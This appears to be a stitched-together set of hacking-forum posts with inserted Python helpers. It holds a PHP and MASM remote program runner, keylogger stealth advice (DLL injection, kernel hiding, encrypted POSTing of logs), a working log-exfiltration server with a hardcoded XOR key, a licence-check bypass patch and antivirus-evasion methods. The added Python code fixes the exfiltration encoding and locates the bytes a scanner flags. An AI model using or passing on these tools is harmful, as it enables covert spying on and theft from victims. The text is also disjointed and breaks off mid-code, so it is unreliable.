            if(!$row)
            {
                echo "<b> No entry with that ID! </b><p>";
            }
            else
            {
                $path = $row[2];
                $writestring = "1\r\n$path"; // '1' means run the program, '\r\n' means newline
                $f = fopen("runinfo.txt", "wb");
                fwrite($f, $writestring);
                fclose($f);
                echo "<b> Program Will Execute In Approximately 1 Minute!</b><p>";
            }
        }
    }
    echo "<h1> Remote Execution Control Panel </h1>";
    echo "<form method='POST' action='$Self'>";
    echo "<table border='0' cellpadding='0' cellspacing='4'>";
    echo "<tr><td>ID</td><td><input type='text' name='id' size='5'></td></tr>";
    echo "<tr><td>Name</td><td><input type='text' name='exename'></td></tr>";
    echo "<tr><td>Path</td><td><input type='text' name='path' size='50'></td></tr>";
    echo "</table><br><input type='submit' name='add' value='Add To List'> ";
    echo "<input type='submit' name='del' value='Delete From List'> ";
    echo "<input type='submit' name='exec' value='Execute!'> ";
    echo "</form>";
    $query = "SELECT * FROM exes";
    $result = mysql_query($query);
    echo "<table border='1' cellspacing='1' cellpadding='1'>";
    echo "<tr><th>ID</th><th>Name</th><th>Path</th></tr>";
    while($row = mysql_fetch_array($result))
    {
        $id = $row[0];
        $name = $row[1];
        $path = $row[2];
        echo "<tr><td>$id</td><td>$name</td><td>$path</td></tr>";
    }
    echo "</table></center></body></html>";
}
?>

Here's the config.php which you put in the same folder as the other PHP file and run.exe. Change the database info to match yours; don't worry about creating a database/schema & table as it does it for you.

<?php
$dbhost = 'localhost:3306';
$dbuser = 'root';
$dbpass = 'ilikephp';
$dbname = 'RemoteExecute';
$Self = $_SERVER['PHP_SELF'];
$conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql');
//Create a database to use if it does not exist yet!
$query = "CREATE DATABASE IF NOT EXISTS RemoteExecute";
$result = mysql_query($query);
mysql_select_db($dbname);
//Create a table which will hold the name and path to the programs we want to execute
$query = "CREATE TABLE IF NOT EXISTS exes(id INT NOT NULL, name VARCHAR(64) NOT NULL, path VARCHAR(260) NOT NULL, PRIMARY KEY(id))";
mysql_query($query);
?>

run.exe source:

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
.486                      ; create 32 bit code
.model flat, stdcall      ; 32 bit memory model
option casemap :none      ; case sensitive

include \masm32\include\windows.inc
include \masm32\include\masm32.inc
include \masm32\include\gdi32.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\Comctl32.inc
include \masm32\include\comdlg32.inc
include \masm32\include\shell32.inc
include \masm32\include\oleaut32.inc
include \masm32\include\msvcrt.inc

includelib \masm32\lib\masm32.lib
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\Comctl32.lib
includelib \masm32\lib\comdlg32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\oleaut32.lib
includelib \masm32\lib\msvcrt.lib

CheckFile PROTO

.data
file      db 'runinfo.txt',0   ; relative to run.exe's working directory, same folder as the PHP files
op        db 'open',0
fhandle   dd 0
buffer    dd 0
bytesread dd 0
hInstance dd 0

.code
start:
    invoke GetModuleHandle, 0
    mov [hInstance], eax
InfiniteLoop:
    call CheckFile
    invoke Sleep, 60000            ; sleep for 1 minute then check file again
    jmp InfiniteLoop

CheckFile proc
    LOCAL byteswritten:DWORD
    invoke CreateFile, addr file, GENERIC_READ + GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0
    mov [fhandle], eax
    .if eax == INVALID_HANDLE_VALUE ; file doesn't exist
        ret
    .endif
    invoke VirtualAlloc, 0, 1000, MEM_COMMIT, PAGE_READWRITE   ; zero-filled, so the path is NUL-terminated
    mov [buffer], eax
    invoke ReadFile, [fhandle], [buffer], 1000, addr bytesread, 0
    mov ecx, [buffer]
    cmp byte ptr [ecx], 31h        ; 31h = '1' formatted text
    jne exitfunc
    add ecx, 3                     ; add 3 to get past "1\r\n" so ecx now points to the path string
    ;we know the file read had a '1' at the first byte so that means we want it to execute
    invoke ShellExecute, 0, addr op, ecx, 0, 0, SW_SHOWNORMAL
    mov eax, [buffer]
    mov byte ptr [eax], 30h        ; move '0' into the first byte of buffer! we will save over the file
    ;so we don't keep running the program every minute
    invoke SetFilePointer, [fhandle], 0, 0, FILE_BEGIN
    invoke WriteFile, [fhandle], [buffer], 1, addr byteswritten, 0   ; only byte 0 is rewritten
exitfunc:
    invoke VirtualFree, [buffer], 0, MEM_RELEASE
    invoke CloseHandle, [fhandle]
    ret
CheckFile endp

end start

Here's the ready-made folder with the already compiled run.exe:
http://www.popeax.com/remoteexecute/remotecontrol.zip

run.exe is only 2.5KB since I used asm ;) You can play around with my web front if you want, but I disabled the saving of the text file and am not currently running run.exe so people won't be able to execute programs on my machine!
http://www.popeax.com/remoteexecute/

So there you have it, a way to get around the limitation of PHP's execute functions, whatever the reason may be... Although if you want to run an app that does a certain thing and terminates itself then using PHP's functions will work fine! But if you're trying to get a GUI app to actually show up, this is a better option... :)
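Added example, not part of the post: a Python model of the runinfo.txt handshake between index.php (the writer) and run.exe (the once-a-minute poller), following the asm's fixed offsets: byte 0 is the flag, the path starts at byte 3 (after "1\r\n"), and only byte 0 is rewritten to '0' after ShellExecute. `simulate` runs the poller for a few one-minute ticks so the one-shot behaviour is visible, and the LF-only case shows why the PHP side must write CRLF. The function names and the sample path are this example's own.

```python
# Added example, not from the original post: the runinfo.txt protocol that
# index.php writes and run.exe polls, modelled on the asm's exact offsets.
# write_runinfo / poll_runinfo / simulate are this example's own names.

FLAG_RUN = b"1"
FLAG_IDLE = b"0"
BUFFER_SIZE = 1000          # run.exe VirtualAllocs 1000 bytes and reads at most that


def write_runinfo(path):
    """What index.php does: fopen("runinfo.txt","wb") and write "1\\r\\n<path>"."""
    return FLAG_RUN + b"\r\n" + path.encode("latin-1")


def poll_runinfo(contents):
    """One CheckFile() pass. Returns (path_to_run or None, new_file_contents).

    The asm looks only at byte 0, then skips exactly three bytes to reach the
    path, and on execution overwrites just byte 0 with '0' so the same entry
    is not run again on the next minute.
    """
    buf = contents[:BUFFER_SIZE]            # ReadFile(..., 1000, ...)
    if buf[:1] != FLAG_RUN:
        return (None, contents)             # '0' (or garbage): nothing to do
    # VirtualAlloc memory is zero-filled, so ShellExecute reads up to the
    # first NUL after the data; for a file >= 1000 bytes there would be none.
    path = buf[3:].split(b"\0", 1)[0].decode("latin-1")
    return (path, FLAG_IDLE + contents[1:])  # WriteFile of 1 byte at offset 0


def simulate(path, minutes=3):
    """Queue one program, then let the poller tick a few times.
    Returns the list of paths that would have been ShellExecute'd."""
    state = write_runinfo(path)
    ran = []
    for _ in range(minutes):
        to_run, state = poll_runinfo(state)
        if to_run is not None:
            ran.append(to_run)
    return ran


if __name__ == "__main__":
    print(simulate("C:\\Windows\\system32\\calc.exe"))   # runs exactly once
    # a writer that uses "\n" alone shifts the path start by one byte
    print(poll_runinfo(b"1\nC:\\Windows\\system32\\calc.exe")[0])
```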
  8. digital pirate!! Have you tried running a GUI exe from PHP with any of those commands like system() or exec()? At first I thought they weren't working and just making the PHP script hang! But actually, I took a look at my task manager and found a bunch of calc.exe's running!! (the program I was testing to run) I specified system("start d:\\windows\\system32\\calc.exe"); you need the double slashes because PHP is like C++: it uses a backslash as an escape character, so putting two results in 1... Why is PHP weird like that and not showing the GUI window of GUI programs? It runs indeed, but it seems as if it doesn't just hide the window but somehow makes it never be created!! I tried unhiding the calculator window with Ghost (my window hider program from the coding section) and it doesn't find the window, which leads me to believe it doesn't exist! So I've been trying to figure out a way to actually allow GUI programs to appear! Since you said batch scripts run fine, I thought of the idea of doing a fopen + fwrite and writing a string like this "start d:\\windows\\system32\\calc.exe" to a batch file named "execute.bat" or "execute.cmd" (.cmd is the same as .bat I think). Neither worked! Well, it did run the calc.exe but the window was still not visible, and as far as I know non-existent... Also cmd.exe seems to run along with the program you made run, and it doesn't exit until you terminate calc.exe with the task manager... Also the PHP script stops hanging and finishes once you end the process... When that didn't work I came up with a new idea... Create a simple program that reads a text file into a memory buffer, and does a ShellExecute, executing the program whose path was contained in the text file... The PHP script saves a text file with the path to the exe (without the start, just the path) and then does a system("run.exe")...

; minimal MASM32 header so the snippet below assembles on its own
.486
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib

.data
file      db 'runinfo.txt',0
op        db 'open',0
fhandle   dd 0
buffer    dd 0
bytesread dd 0
hInstance dd 0

.code
start:
    invoke GetModuleHandle, 0
    mov [hInstance], eax
    invoke CreateFile, addr file, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0
    mov [fhandle], eax
    .if eax == INVALID_HANDLE_VALUE ; file doesn't exist
        invoke ExitProcess, 0
    .endif
    invoke VirtualAlloc, 0, 1000, MEM_COMMIT, PAGE_READWRITE   ; zero-filled, so the path ends in a NUL
    mov [buffer], eax
    invoke ReadFile, [fhandle], [buffer], 1000, addr bytesread, 0
    invoke CloseHandle, [fhandle]
    ;path to the exe to execute is now loaded into the memory buffer
    invoke ShellExecute, 0, addr op, [buffer], 0, 0, SW_SHOWNORMAL
    ;SW_SHOWNORMAL was my attempt at getting the window to show
    ;since the window doesn't ever exist it doesn't work!
    invoke ExitProcess, 0
end start

Now I'm getting closer! The run.exe executes fine, reads the file, does the ShellExecute, and calc.exe is running... still no window, but cmd.exe no longer runs, and the PHP script no longer hangs; it returns immediately after run.exe terminates itself... I've enumerated all windows with Spy++ and an example app that comes with MASM32 and the calculator window does not appear on the list!!! The enumerated windows list shows all windows, hidden or visible, so PHP is somehow preventing windows from appearing! Why would they want to do that? I think I've thought of an alternative way to get this to work! It involves not using any execute commands from PHP itself... Since PHP isn't doing the executing I'm confident the windows will appear... I'll code it and post back in a short while!
  9. I can't watch that crap!! It's a bunch of bull$hit propaganda!!! They can never regulate the internet because of its free nature! I'm running a webserver off my computer right now and anyone in the world can connect to it! No matter if they connect with dialup, or satellite, or whatever! The internet is a huge gigantic network of computers! We are all hooked up together! Nothing can break that connection; something so massive is impossible to stop! There's always going to be people like that spreading around rumors and crap trying to get you to believe in them! They have built up an illusion in their own minds as to what is the end-all be-all of the internet! And you know what? They are full of shit! So don't worry about anything! Don't stress over it! SEND YOUR PACKETS PROUDLY! No matter what browser you use, what OS you have, your CPU, RAM, motherboard or any of that! The electrical signals are going to flow, send and receive! And I choose not to receive those particular bits and bytes! That video stream you saw: your browser downloaded those packets and showed you the video! I closed my connection with that server! If you don't like the content you receive from a particular server you can choose to end the connection! That's what the internet's about! The freedom to connect, download, upload, share, read, write, or otherwise interpret any kind of data you want! If you don't like the content, then you choose not to receive it! No one can force content on you! You can't control people's electrical impulses! Everything is made up of electrical signals: through your mind, through your body, through the internet! It's electric! So those guys sent you some bad electrical signals! So find some good ones to make up for it! Stay positive! Positivity creates more positive energy! Negativity creates negative energy! ++++++++ If some old gray-haired politicians think they can control the "internet" they don't really understand what the internet is themselves!
It's bigger than them; it's bigger than they can ever be! It's like a little tiny small guy trying to tell a giant what to do! The giant won't even notice the guy and accidentally crush him under his shoe! ;) Ignore the negative thinkers! Think positive and you'll create a positive world for yourself! Here's a video I actually watched! Made me laugh ;) lol it made up for that 10 seconds of bad vibes from that other vid http://www.webcastr.com/videos/humor/techno-chicken.html
  10. Well I won't post code but I'll give you a couple of tips on making a good one:
1. Catch repeated keystrokes (so for example if you press a key, I'm sure you don't press keys so fast, like 10 milliseconds a key; usually humans press and release keys in about 100-200 milliseconds). Pausing your get-key code for that long isn't a good idea because then you'll miss keys. Instead catch repeated ones and don't put them in your buffer (if the key is released however and pressed again it is logged).
2. Use the GetAsyncKeyState() API - keyboard hooks and the like are very detectable; GAKS is by far the best method for a usermode logger. Unless you're a good kernel programmer I'd stick with this API.
3. Don't email your logs; emails are easily picked up by any AV, and will be stopped in their tracks, and the user will be alerted that an email is being sent out and your little home away from home on their machine will be discovered and it'll be all for naught. Same thing kinda: don't FTP either! Leaving a username and password of any kind is leaving a link to you; you don't want that. Avoid the FTPizzle and go with the PHPizzle and MYSQLizzle. It's easy to set up and the best way of retrieving logs, found here----> http://hak5.org/forums/index.php?showtopic=9644
4. Never save any log files onto the computer. When the number of characters reaches a certain number in the buffer, or a certain time has passed, encrypt the keystroke buffer (actually you could even encrypt the characters as they are typed for extra security), and POST it to your PHP page.... Any packets going across the pipeline are unreadable and unclear what they are for... Even just a simple encryption will do... Once the packet is sent, zero the buffer: ZeroMemory(buffer, sizeof(buffer)); or memset(buffer, 0, sizeof(buffer)); etc...
5. Come up with a clever way to hide your running code: create some threads in a process that's always running on the computer / inject a DLL into an always running process / hide your running executable using a kernel mode driver / disable Windows File Protection and modify a system process and embed your code within it / many more ways I haven't even thought of yet!
LEGAL DISCLAIMER:
6. Never ever install it on any machine that you do not own! Respect others' privacy and test your software on your own computers! And with that have fun coding! ;)
  11. Why would you need to run an Apache webserver from your USB drive? You need to start thinking outside of the box, or in your case the USB DRIVE! Simply use the HTTP protocol and post data to a form on some remote website, which you can then do anything desired with the data, including SendMail(), although I think storage in a database is the better option ;)
  12. OK, well, I've never used a Hacksaw or a Switchblade (since I prefer to create my own apps). Anyways, from what I've gathered, your hack/blade uses Gmail to receive the log files... This is bad because you're having to leave your EMAIL and PASSWORD on a remote machine... and I know Gmail, at least back when I made an account, requires that you have a cell phone to create an account, so it's not like you can make that many! I was using FTP at first for my app, but I still didn't like having to leave a username + password contained within the software! Here is my better, safer, anonymous method of getting your data. One day I was writing a post here on hak5 when it hit me!

[CLIENT ON REMOTE MACHINE] -> FREE WEBSERVER -> PHP -> MYSQL DATABASE

Think about what I'm doing right now: I'm typing text into a box, and when I click the "Post" button, the PHP page that this form data gets submitted to inserts my post into the database... When you have seen my topic and clicked on my post, the text I have posted was fetched from the database and the HTML code was dynamically created by the PHP for your viewing pleasure... We (non-hak5 admins) have no way of knowing the MySQL database password, and there isn't a reason for us to have it either; we can post data to the database without it... I have created a sample app, which can be modified for your needs... I'm sure you could get it to post your LM hash files or whatever files switch/saw saves to your database!

Here's what you need... Find a free web provider which offers PHP and at least 1 MySQL database, also for free! If you can't find one that offers MySQL, you could run your own MySQL database server and find a free host with PHP, and you could still keep your MySQL password hidden... Because of the way PHP works, it's server-sided: you cannot see the PHP code, only the HTML code generated by it! THAT'S IT! Once you've got that set up, you're ready to receive your data!

Make the password a good strong password and change the username from root if you can... I had to do a little research on the HTTP protocol, and also I used a packet sniffer and attached it to Firefox while I submitted a form on a website... My example program is called "SwiftSubmit"; it lets you type up to 8000 characters into the box, and once you click submit it sends a packet like this to the host you want it to connect to. This is all anyone sniffing packets will see: where it's going and other info, but the 'log' data is scrambled!

POST /sendmeyourpackets/index.php HTTP/1.1
Host: popeax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
connection: keep-alive
Referer: http://localhost/pwned.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 346

name=Liz7783&log=.!HuMJUFQL@HPKBH.OJUFQL@[cut]

Here's a picture of it, also with the nice little web front end in the background I made for it to decode, decrypt and view the logs in the database... As you can see from this picture below of MySQL Query Browser, the data is encrypted in the database itself... If you're wondering about the names, I like to name all my computers as well as log their IP; it just makes it easier for me... The software randomly chooses a name for the computer it's run on.

Source Code + Binary: http://popeax.com/sendmeyourpackets/SwiftSubmit.zip

Go ahead and test it out on my web server! I can kind of have my own little hak5 wall goin', lol! You can log in to the web front end and see if anyone posted, or see if your post worked!

http://popeax.com/sendmeyourpackets/viewlogs.php -> user: root, password: 1337

SOURCE:

<?php
include('config.php');

if(isset($_POST['auth']))
{
    $user = $_POST['user'];
    $pass = $_POST['pword'];
    $logininfo = "$user-$pass";
    setcookie("chocolatechipcookie", $logininfo, time()+1200); // 1200 = 20 minutes
    echo "<meta http-equiv='refresh' content='0;url=$Self'>";
}

if(isset($_COOKIE['chocolatechipcookie'])) // every time you refresh the page you'll stay logged in for 20 minutes
{
    $logininfo = $_COOKIE['chocolatechipcookie'];
    setcookie("chocolatechipcookie", $logininfo, time()+1200);
}
?>
<html>
<head>
<title>Log Viewer v1.0 - by Steve8x</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<center>
<?php
// must change these to be secure so no one can read your logs but you
$USER = "root";
$PASSWORD = "1337";

// very similar to my C++ version: repeating-key XOR, byte i against password[i mod len]
function XORbuffer($buffer, $password)
{
    $passlength = strlen($password);
    $bufflength = strlen($buffer);
    $x = 0;
    for($i = 0; $i < $bufflength; $i++)
    {
        if($x == $passlength)
        {
            $x = 0;
        }
        $buffer[$i] = $buffer[$i] ^ $password[$x];
        $x++;
    }
    return $buffer;
}

// if no cookie is set, then show the login page
if(!isset($_COOKIE['chocolatechipcookie']))
{
    echo "<h1> Admin Login: </h1>";
    echo "<p><form method='post' action='$Self'>";
    echo "<table border='2' cellspacing='2' cellpadding='0'><tr>";
    echo "<td>Username: </td><td> <input name='user' type='text' id='user'> </td> </tr>";
    echo "<tr><td>Password: </td><td> <input name='pword' type='password' id='pword'></td></tr> </table>";
    echo "<p> <input type='submit' name='auth' id='auth' value='Login'>";
    echo "</form>";
    die();
}
else
{
    // otherwise validate the username and password stored in the cookie!
    $logininfo = $_COOKIE['chocolatechipcookie'];
    list($usr, $pass) = explode('-', $logininfo, 2); // explode() instead of the deprecated split()
    // If you enter the wrong username or password you'll have to clear your cookies in your browser
    // it's made that way as an annoyance to deter someone from attempting to guess
    // HOWEVER they shouldn't know about your page anyway...
    if($usr != $USER)
    {
        die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>");
    }
    if($pass != $PASSWORD)
    {
        die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>");
    }
    echo "<form method=\"post\" action=\"$Self\">";
    echo "<input type=\"submit\" name=\"save\" id=\"save\" value=\"Save Logs To File!\"><p>";
    echo "</form>";
    // let's fetch that data from the database!
    $query = "SELECT * FROM data";
    $result = mysql_query($query);
    $savefile = 0; // only write savedlogs.txt when the button was clicked
    if(isset($_POST['save']))
    {
        $savefile = 1;
        $file = fopen("savedlogs.txt", "w");
    }
    echo "<table border='1' cellspacing='1' cellpadding='1'>";
    echo "<tr><th>ID</th><th>Name</th><th>IP</th><th>LOG</th></tr>";
    while($row = mysql_fetch_array($result))
    {
        $id = $row[0];
        $name = $row[1];
        $ip = $row[2];
        $log = $row[3];
        // change the password "hak5liverocks" here and also in your C++ program
        // they have to match so that this page can properly decrypt the stored data
        // the data is always stored encrypted in the database...
        // it's only decrypted when you want to view it!
        // or save it to a text file
        $decoded = urldecode($log);
        $decrypted = XORbuffer($decoded, "hak5liverocks");
        if($savefile == 1)
        {
            $preparedstring = "name-> $name ip-> $ip log-> $decrypted\r\n";
            fwrite($file, $preparedstring);
        }
        echo "<tr><td>";
        echo "$id";
        echo "</td><td>";
        echo "$name";
        echo "</td><td>";
        echo "$ip";
        echo "</td><td>";
        echo "$decrypted";
        echo "</td></tr>";
    }
    if($savefile == 1) fclose($file);
    echo "</table>";
}
?>

http://popeax.com/sendmeyourpackets/index.php SOURCE:

<?php
include ('config.php');

if(isset($_POST['name'])) // this means our little program is sending us data :)
{
    $ip = $_SERVER['REMOTE_ADDR'];
    $name = $_POST['name'];
    $log = $_POST['log'];
    $name = mysql_real_escape_string($name);
    $log = mysql_real_escape_string($log);
    // insert the encrypted + minimally encoded data into the database!
    $query = "INSERT INTO data (name, ip, log) VALUES ('$name', '$ip', '$log')";
    mysql_query($query);
}
else // otherwise someone's just looking at the page
{
    echo "<center><h1>You Got PWNED!</h1><img src=\"pwned.jpg\"></center>";
}
// the \" are to escape the quotes! in this case you could have also just used single quotes ' '
// but that's not always the case so it's good to know how to escape characters!
?>

config.php SOURCE:

<?php
$dbhost = 'localhost:3306';
$dbuser = 'nottellingyou';
$dbpass = 'hak5liverocks';
$dbname = 'collecteddata';
$Self = $_SERVER['PHP_SELF'];
$conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql');
$query = "CREATE DATABASE IF NOT EXISTS collecteddata"; // creates the database for you if it doesn't exist yet
$result = mysql_query($query);
mysql_select_db($dbname);
$query = "CREATE TABLE IF NOT EXISTS data(id INT NOT NULL AUTO_INCREMENT, name VARCHAR(30) NOT NULL, ip VARCHAR(30) NOT NULL, log VARCHAR(8000) NOT NULL, PRIMARY KEY(id))"; // create the table if it doesn't exist
mysql_query($query);
?>

Oh, and the XOR encryption used is slightly better than what I've shown before in other topics... Instead of XORing EACH byte of the buffer with EACH character of the password, I only XOR each SUCCESSIVE character of the buffer with each SUCCESSIVE character of the password. This makes it way more secure: the previous method reduced the 'password' to only 1 character; this now requires all characters of the password so the plain text can be revealed. Well, what do you think, should I keep the encryption? Or just go with encoding? With the encryption, not all characters seem to come out exactly the same as when posted; there's something not quite right... That's not a big deal for text data, but as you can imagine, for binary data or something where every single byte has to be right or it'll be messed up, it's a problem... So I'm a little confused on how to get this working 100% smooth. Should I encode then encrypt? Or encrypt then encode? lol !!! Right now it's about 95%; I just gotta fully figure out the encoding bit. I probably have to encode more chars than just '&' and spaces... That's probably what's messing up some characters sometimes... I know one problem, though, that I dealt with the best I could: the '&' signs... If you encrypt your data and one of those just so happens to be a resulting character after the encryption, that's going to mess up your posted data; it will stop right there, and no more data will be gotten for that field (because it thinks you're declaring data for another field), like "name", "log", etc... Well, if anyone is good with encoding + encrypting together, let me know, and this thing will have perfect 100% readability... If I removed the encryption and just used encoding, all the characters would always be readable, but I'd lose the little security provided by it... So I'd rather keep it and figure something out to where the encoding + encrypting can work together! :)
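On the encrypt-or-encode-first question in the post above, here is an added example (my own code, not the post's and not part of SwiftSubmit) that models both sides in Python: the client encrypts first and then percent-encodes every byte of the ciphertext, and the server splits the fields, decodes once and XORs. It reuses the repeating-key XOR of the post's XORbuffer() and the key "hak5liverocks" from config.php; the sample log line is constructed, and the second client function reproduces the post's approach of escaping only '&' and spaces so the two can be compared. Two things a practitioner would check here: PHP has already urldecoded $_POST['log'] by the time index.php stores it, so the urldecode() in viewlogs.php is a second decode and turns any '+' or '%XX' that survives in the stored ciphertext into different bytes (decode exactly once); and repeating-key XOR only hides the bytes from a glance at the packet, since thirteen bytes of guessed plaintext give back the whole key.

```python
"""Encrypt-then-encode round trip for an x-www-form-urlencoded POST.

Added example, not code from the post.  Reuses the post's repeating-key XOR
and the key "hak5liverocks"; models the PHP server side in Python.  The sample
log line is constructed for the demo.
"""
from urllib.parse import quote, unquote_to_bytes

KEY = b"hak5liverocks"  # shared key from the page's config.php / viewlogs.php


def xor_buffer(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (byte i ^ key[i % len(key)]); self-inverse, so the
    same call decrypts.  Hides bytes from a casual sniffer only: a guessed
    len(key) bytes of plaintext recover the entire key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def old_xor(data: bytes, key: bytes) -> bytes:
    """The earlier scheme the post mentions: each byte XORed with EVERY key
    character.  XOR folds those into one constant, i.e. a 1-byte key."""
    folded = 0
    for k in key:
        folded ^= k
    return bytes(b ^ folded for b in data)


def form_urldecode(value: str) -> bytes:
    """What PHP does to a form value: '+' becomes a space, %XX becomes a byte."""
    return unquote_to_bytes(value.replace("+", " "))


def parse_form_body(body: str) -> dict:
    """Split 'a=1&b=2' into {name: decoded_bytes}.  '&' and the first '=' are
    the separators, which is why raw ciphertext must never contain them."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            fields[name] = form_urldecode(value)
    return fields


def server_recover(body: str, key: bytes) -> bytes:
    """Server side as index.php + viewlogs.php should do it: decode ONCE, then XOR."""
    return xor_buffer(parse_form_body(body)["log"], key)


def build_post_body(name: str, log: bytes, key: bytes) -> str:
    """The fix: encrypt FIRST, then percent-encode every ciphertext byte that is
    not unreserved.  quote(..., safe='') escapes '&', '=', '+', '%', space,
    NUL and every byte >= 0x80, so nothing can be read as form syntax."""
    cipher = xor_buffer(log, key)
    return "name=" + quote(name, safe="") + "&log=" + quote(cipher, safe="")


def naive_post_body(name: str, log: bytes, key: bytes) -> str:
    """The post's approach: only '&' and spaces in the ciphertext are escaped."""
    cipher = xor_buffer(log, key).decode("latin-1")
    cipher = cipher.replace("&", "%26").replace(" ", "+")
    return "name=" + name + "&log=" + cipher


if __name__ == "__main__":
    log = b"Card PIN 4921 & pw: hunter2"  # constructed sample log line
    ok = server_recover(build_post_body("Liz7783", log, KEY), KEY) == log
    broken = server_recover(naive_post_body("Liz7783", log, KEY), KEY) == log
    print("encrypt, then percent-encode everything:", ok)      # True
    print("escape only '&' and space:              ", broken)  # False
    # 'C' ^ 'h' == '+', which the server decodes to a space, so the first
    # byte comes back as 'H' instead of 'C'.
```

The order matters because the escaping layer is what keeps the form parser honest: once every ciphertext byte is percent-encoded, the server's single decode is exact for all 256 byte values, and the XOR key can be swapped for a real cipher later without touching the transport.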
  13. Steve8x
    ScanDisk 16G
    Well, I'm sure at least 1 of the creators of the U3 technology knew the capacity of such a device and what it can do, and that person helped bring it to life ;) Maybe not all of U3, but "someone" was thrilled about the new device: a CD-ROM drive that fits in your pocket :)

Last time I tried the LP-installer from SanDisk, neither placing the ISO in the same dir nor spoofing the SanDisk website to my localhost worked at flashing the CD-ROM partition... The first thing was taken out purposely, as I've heard... The second thing, to me, appears like SanDisk is not only not loading ISOs from the directory of lpinstaller, but they are also doing a check on the ISO file itself... If it is not the ISO from SanDisk, it gives you a b$ error message! So in order to use the lpinstaller, I'd think you'd have to hack it: find where in the program it's checking the ISO file, whether it's the one that's "supposed" to be flashed instead of a custom one... If the program is packed, though, it will make it a bit harder... (I have almost no experience with unpacking personally), although you could just modify its memory while it's running, if that's the case, instead of patching the executable... Basically it all comes down to a conditional jump somewhere along the lines... Once you find it, it will accept your ISO as if it was from SanDisk itself!

cmp [eax+12], 01
jne InvalidISOGiveThisHackerTheErrorMessage
jmp FlashISO

Let's say eax+12 is the memory location, the one which holds the value which decides whether the ISO is valid or not. Either NOP out the cmp and the jne, or turn the jne into an unconditional jump. For those not ASM-minded: JNE means JUMP IF NOT EQUAL (conditional jump); JMP means ALWAYS JUMP (unconditional jump). Of course it could be set up differently than that, but you get the idea; it'll be something like that :) Happy hunting!

Another option would probably be to reverse engineer lpinstaller or Universal Customizer and figure out how it flashes the CD-ROM partition; then you could make an updated version of UC which removes the problem of shrinkage ;)
  14. *All the PUBLIC tools and payloads are detectable by almost any AV... because once the AV people get their hands on a "payload" they create little virus "signatures", I think they are called... which are just an array of byte codes which make up a program in a certain order... If an AV picks up a number of bytes arranged in the same order as one of the virus signatures in their database, it flags the file as a virus/trojan/whatever, usually with some b$ name that doesn't even make sense and is not what it is at all... There have been countless times when a non-malicious file was flagged as malicious by my anti-virus! It's really annoying, especially when you know it's a clean file! Just because the file contains similar bytes to that of a file someone made a virus out of!!

You can still make what's detectable undetectable again! But you have to change the code around! Sometimes a lot! You need to make it so the arrangement of bytes that make up the program isn't picked up by AV... AVs don't detect the method used to do something (at least not usually); they detect certain byte patterns... Here's an example (note: this is just a random disassembled output taken from a random program). Now let's say that block of code is in an AV database as part of a virus signature. You can see the bytes to the left and the opcodes to the right... Now if you had the source code to this program, you'd locate where this is in your source code and change the order of things, add in some new stuff, remove things, etc... make it look like a different program... In turn, the order of these bytes will change around... I wouldn't recommend trying to make a program undetectable that you don't have the source code to, as it would be a tedious job, unless the program was coded in ASM to begin with; then it would be more lightweight... Obviously some of these codes have to be in the order that they are for things to work right, but you change what you can!

OK. Here's a scenario! Let's say a program you've made which was once undetectable is now detectable by anti-viruses because some jerk-off coded a malicious program that has similar code to yours... What you do is you comment EVERYTHING out! Comment all your code out and re-compile. Now are you undetectable? You should be! If so, continue! Un-comment your code little by little, until you find out where in your code you're being picked up by AV! Once you find the problem area in your code, now you've spotted your problem. Change it around, like I said before. Add new stuff, remove old stuff, change the order of things, until you are undetectable once again! :) Trial and error... repeat until you are successful! That is how you make programs undetectable.
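The post above describes two things a detection engineer can put in code: a signature as a fixed run of bytes that must appear in order, and the "comment it out piece by piece" loop for finding which part of a file a scanner keys on. The added example below (my own code, not the post's, and not from any real AV) does both in Python: a small scanner for hex signatures with '??' single-byte wildcards, modelled on the ClamAV hex-signature syntax, and a black-box locator that blanks ranges of the file and re-runs the scanner as an oracle, binary-searching for the smallest byte range that must stay intact for the file to be flagged. The signature and the two sample buffers are constructed for the demo; the "reordered" buffer swaps two bytes of the flagged run to show that a fixed-order signature no longer matches.

```python
"""Fixed-byte-pattern signature scanner plus a black-box detection locator.

Added example, not the post's code.  The signature syntax (hex bytes, '??' for
any one byte) is modelled on ClamAV hex signatures; the signature and sample
buffers are constructed for the demo and come from no real AV database.
"""
import re


def compile_signature(hex_sig: str) -> re.Pattern:
    """'55 8b ec ?? 45 fc' -> bytes regex; '??' matches exactly one byte."""
    parts = []
    for tok in hex_sig.split():
        parts.append(b"." if tok == "??" else re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def scan(data: bytes, signatures: dict) -> list:
    """Return [(name, offset)] for each signature found in data (first hit)."""
    hits = []
    for name, hex_sig in signatures.items():
        m = compile_signature(hex_sig).search(data)
        if m:
            hits.append((name, m.start()))
    return hits


def locate_detected_range(data: bytes, is_detected):
    """Black-box form of the post's 'comment it out piece by piece' loop.

    is_detected(bytes) -> bool is the scanner used as an oracle.  Ranges are
    blanked to 0x00 and the oracle re-run, binary-searching for the smallest
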